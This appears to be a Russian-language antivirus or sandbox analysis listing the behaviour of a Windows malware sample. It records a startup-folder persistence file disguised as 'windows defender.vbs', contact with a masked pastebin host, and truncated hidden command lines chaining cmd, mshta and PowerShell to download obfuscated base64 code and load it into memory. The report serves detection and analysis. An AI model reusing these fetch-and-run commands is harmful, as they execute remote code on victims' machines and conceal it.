Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\windows defender.vbs
- nul
- 'pa###bin.com':443
- DNS ASK pa###bin.com
- '<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object ...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object ...
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 10
- '<SYSTEM32>\mshta.exe' vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('h'+'t'+'t'+...